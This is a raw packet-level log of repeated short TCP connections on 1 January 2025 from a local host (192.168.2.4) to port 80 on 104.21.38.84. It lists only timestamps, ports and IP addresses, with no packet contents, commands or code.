Jan 1, 2025 14:52:38.589401960 CET	49790	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:38.660835981 CET	49791	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:38.667342901 CET	80	49791	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:38.667427063 CET	49791	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:38.667593956 CET	49791	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:38.672974110 CET	80	49791	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:39.026979923 CET	49791	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:39.032098055 CET	80	49791	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:39.136480093 CET	80	49791	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:39.183163881 CET	49791	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:39.393894911 CET	80	49791	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:39.448791981 CET	49791	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:39.504551888 CET	49791	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:39.505179882 CET	49792	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:39.513417959 CET	80	49792	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:39.513519049 CET	49792	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:39.513586044 CET	49792	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:39.513605118 CET	80	49791	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:39.513662100 CET	49791	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:39.518413067 CET	80	49792	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:39.872229099 CET	49792	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:39.877115965 CET	80	49792	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:39.973073006 CET	80	49792	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:40.026925087 CET	49792	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:40.145785093 CET	80	49792	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:40.198788881 CET	49792	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:40.270163059 CET	49792	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:40.270714998 CET	49793	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:40.275346041 CET	80	49792	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:40.275409937 CET	49792	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:40.275626898 CET	80	49793	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:40.275688887 CET	49793	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:40.275779963 CET	49793	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:40.280637980 CET	80	49793	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:40.620811939 CET	49793	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:40.625825882 CET	80	49793	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:40.724850893 CET	80	49793	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:40.776773930 CET	49793	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:40.992047071 CET	80	49793	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:41.042628050 CET	49793	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:41.079430103 CET	80	49793	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:41.120691061 CET	49793	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:41.192734003 CET	49793	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:41.193305016 CET	49794	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:41.197801113 CET	80	49793	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:41.197876930 CET	49793	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:41.198219061 CET	80	49794	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:41.198282957 CET	49794	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:41.198474884 CET	49794	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:41.203267097 CET	80	49794	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:41.543543100 CET	49794	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:41.548557997 CET	80	49794	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:41.642235041 CET	80	49794	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:41.683173895 CET	49794	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:41.825586081 CET	80	49794	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:41.870682955 CET	49794	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:41.942066908 CET	49794	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:41.942368031 CET	49795	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:41.947223902 CET	80	49794	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:41.947267056 CET	80	49795	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:41.947289944 CET	49794	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:41.947333097 CET	49795	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:41.947452068 CET	49795	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:41.952666998 CET	80	49795	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:42.292756081 CET	49795	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:42.297888994 CET	80	49795	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:42.403363943 CET	80	49795	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:42.448829889 CET	49795	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:42.657548904 CET	49795	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:42.657959938 CET	49796	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:42.662638903 CET	80	49795	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:42.662796974 CET	49795	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:42.662812948 CET	80	49796	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:42.662883043 CET	49796	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:42.662996054 CET	49796	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:42.667807102 CET	80	49796	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:42.770525932 CET	49797	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:42.775527000 CET	80	49797	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:42.775628090 CET	49797	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:42.775713921 CET	49797	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:42.780551910 CET	80	49797	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:43.011396885 CET	49796	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:43.016475916 CET	80	49796	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:43.016513109 CET	80	49796	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:43.107198954 CET	80	49796	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:43.120798111 CET	49797	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:43.125756979 CET	80	49797	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:43.151962996 CET	49796	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:43.221460104 CET	80	49797	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:43.277024031 CET	49797	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:43.291773081 CET	80	49796	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:43.339457989 CET	49796	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:43.482471943 CET	80	49797	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:43.526935101 CET	49797	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:43.598694086 CET	49796	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:43.598756075 CET	49797	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:43.599363089 CET	49798	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:43.603686094 CET	80	49796	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:43.603748083 CET	49796	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:43.603964090 CET	80	49797	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:43.604007006 CET	49797	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:43.604162931 CET	80	49798	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:43.604218960 CET	49798	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:43.604300022 CET	49798	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:43.609168053 CET	80	49798	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:43.948909044 CET	49798	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:43.953782082 CET	80	49798	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:44.098159075 CET	80	49798	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:44.151940107 CET	49798	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:44.367451906 CET	80	49798	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:44.417578936 CET	49798	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:44.487296104 CET	49790	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:44.490288973 CET	49798	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:44.490977049 CET	49799	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:44.495271921 CET	80	49798	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:44.495347023 CET	49798	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:44.495793104 CET	80	49799	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:44.495872021 CET	49799	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:44.496001959 CET	49799	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:44.500849009 CET	80	49799	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:44.855182886 CET	49799	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:44.861169100 CET	80	49799	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:44.939821959 CET	80	49799	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:44.995722055 CET	49799	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:45.213793039 CET	80	49799	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:45.261461020 CET	49799	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:45.341649055 CET	49800	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:45.347563028 CET	80	49800	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:45.347636938 CET	49800	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:45.347796917 CET	49800	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:45.353982925 CET	80	49800	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:45.699018002 CET	49800	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:45.703872919 CET	80	49800	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:45.833700895 CET	80	49800	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:45.886389971 CET	49800	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:46.006536007 CET	80	49800	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:46.058317900 CET	49800	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:46.129550934 CET	49800	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:46.130268097 CET	49801	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:46.134592056 CET	80	49800	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:46.134670973 CET	49800	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:46.135226011 CET	80	49801	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:46.135302067 CET	49801	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:46.135413885 CET	49801	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:46.140322924 CET	80	49801	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:46.480454922 CET	49801	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:46.485507965 CET	80	49801	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:46.608587027 CET	80	49801	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:46.652084112 CET	49801	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:46.874351978 CET	80	49801	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:46.917707920 CET	49801	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:46.990053892 CET	49801	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:46.990689039 CET	49802	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:46.995141983 CET	80	49801	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:46.995204926 CET	49801	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:46.995529890 CET	80	49802	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:46.995769978 CET	49802	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:46.996001005 CET	49802	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:47.000817060 CET	80	49802	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:47.355566025 CET	49802	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:47.360439062 CET	80	49802	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:47.449286938 CET	80	49802	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:47.495719910 CET	49802	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:47.716538906 CET	80	49802	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:47.761466980 CET	49802	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:47.838040113 CET	49802	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:47.838522911 CET	49803	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:47.843185902 CET	80	49802	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:47.843274117 CET	49802	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:47.843374968 CET	80	49803	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:47.843441963 CET	49803	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:47.843517065 CET	49803	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:47.848422050 CET	80	49803	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:48.198997021 CET	49803	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:48.203941107 CET	80	49803	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:48.293790102 CET	49803	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:48.294271946 CET	49804	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:48.298860073 CET	80	49803	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:48.298924923 CET	49803	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:48.299105883 CET	80	49804	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:48.299171925 CET	49804	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:48.299252987 CET	49804	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:48.304147005 CET	80	49804	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:48.411508083 CET	49805	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:48.416402102 CET	80	49805	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:48.416496038 CET	49805	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:48.416573048 CET	49805	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:48.421389103 CET	80	49805	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:48.652108908 CET	49804	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:48.657094955 CET	80	49804	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:48.657131910 CET	80	49804	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:48.746593952 CET	80	49804	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:48.761404037 CET	49805	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:48.766316891 CET	80	49805	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:48.792606115 CET	49804	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:48.859692097 CET	80	49805	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:48.902163982 CET	49805	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:49.014851093 CET	80	49804	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:49.029669046 CET	80	49805	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:49.058235884 CET	49804	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:49.073885918 CET	49805	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:49.145406008 CET	49804	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:49.145428896 CET	49805	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:49.146100998 CET	49806	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:49.150783062 CET	80	49804	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:49.150866985 CET	49804	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:49.150945902 CET	80	49806	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:49.151015043 CET	49806	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:49.151092052 CET	80	49805	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:49.151153088 CET	49805	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:49.151197910 CET	49806	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:49.156016111 CET	80	49806	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:49.495932102 CET	49806	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:49.500849009 CET	80	49806	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:49.597302914 CET	80	49806	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:49.651972055 CET	49806	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:49.866640091 CET	80	49806	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:49.917612076 CET	49806	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:49.989409924 CET	49808	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:49.994368076 CET	80	49808	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:49.994437933 CET	49808	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:49.994513035 CET	49808	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:49.999387980 CET	80	49808	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:50.339601040 CET	49808	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:50.344480038 CET	80	49808	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:50.472712040 CET	80	49808	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:50.516894102 CET	49808	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:51.034471035 CET	80	49808	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:51.089493036 CET	49808	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:51.144542933 CET	49808	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:51.145173073 CET	49809	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:51.149610043 CET	80	49808	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:51.149678946 CET	49808	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:51.150074005 CET	80	49809	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:51.150140047 CET	49809	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:51.150233984 CET	49809	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:51.155038118 CET	80	49809	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:51.495820999 CET	49809	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:51.500757933 CET	80	49809	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:51.592094898 CET	80	49809	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:51.636354923 CET	49809	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:51.864300013 CET	80	49809	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:51.917717934 CET	49809	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:51.988802910 CET	49809	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:51.989557981 CET	49810	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:51.993907928 CET	80	49809	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:51.993989944 CET	49809	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:51.994534016 CET	80	49810	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:51.994602919 CET	49810	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:51.994693041 CET	49810	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:51.999473095 CET	80	49810	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:52.339708090 CET	49810	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:52.344804049 CET	80	49810	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:52.440845013 CET	80	49810	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:52.495752096 CET	49810	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:52.702603102 CET	80	49810	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:52.745745897 CET	49810	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:52.816581964 CET	49810	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:52.817229986 CET	49811	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:52.822079897 CET	80	49810	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:52.822125912 CET	80	49811	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:52.822263002 CET	49810	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:52.822299004 CET	49811	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:52.822398901 CET	49811	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:52.827236891 CET	80	49811	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:53.167794943 CET	49811	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:53.172818899 CET	80	49811	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:53.266319036 CET	80	49811	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:53.308259964 CET	49811	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:53.529279947 CET	80	49811	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:53.573880911 CET	49811	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:53.648850918 CET	49811	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:53.649174929 CET	49813	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:53.653976917 CET	80	49811	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:53.654021978 CET	80	49813	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:53.654047966 CET	49811	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:53.654098988 CET	49813	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:53.654299021 CET	49813	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:53.659110069 CET	80	49813	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:54.011516094 CET	49813	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:54.016475916 CET	80	49813	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:54.027724028 CET	49813	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:54.028290987 CET	49814	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:54.033083916 CET	80	49813	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:54.033138990 CET	49813	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:54.033142090 CET	80	49814	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:54.033204079 CET	49814	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:54.033298016 CET	49814	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:54.038104057 CET	80	49814	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:54.145483017 CET	49815	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:54.150407076 CET	80	49815	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:54.150506020 CET	49815	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:54.150602102 CET	49815	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:54.155458927 CET	80	49815	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:54.386501074 CET	49814	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:54.391392946 CET	80	49814	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:54.391525984 CET	80	49814	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:54.495874882 CET	49815	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:54.500840902 CET	80	49815	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:54.505791903 CET	80	49814	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:54.558268070 CET	49814	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:54.595266104 CET	80	49815	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:54.636414051 CET	49815	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:54.664134026 CET	80	49814	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:54.714550972 CET	49814	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:54.850723028 CET	80	49815	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:54.902020931 CET	49815	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:55.058741093 CET	49814	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:55.058816910 CET	49815	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:55.059484005 CET	49821	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:55.063719034 CET	80	49814	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:55.063775063 CET	49814	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:55.064172029 CET	80	49815	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:55.064233065 CET	49815	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:55.064259052 CET	80	49821	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:55.064311028 CET	49821	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:55.064404964 CET	49821	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:55.069139004 CET	80	49821	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:55.417722940 CET	49821	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:55.422692060 CET	80	49821	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:55.535515070 CET	80	49821	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:55.589531898 CET	49821	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:55.705616951 CET	80	49821	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:55.745801926 CET	49821	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:55.817410946 CET	49821	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:55.818103075 CET	49827	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:55.822380066 CET	80	49821	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:55.822443962 CET	49821	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:55.822969913 CET	80	49827	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:55.823026896 CET	49827	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:55.823117971 CET	49827	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:55.827858925 CET	80	49827	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:56.167776108 CET	49827	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:56.172666073 CET	80	49827	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:56.267302990 CET	80	49827	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:56.308283091 CET	49827	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:56.529376030 CET	80	49827	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:56.573909998 CET	49827	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:56.649223089 CET	49827	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:56.650063038 CET	49833	80	192.168.2.4	104.21.38.84
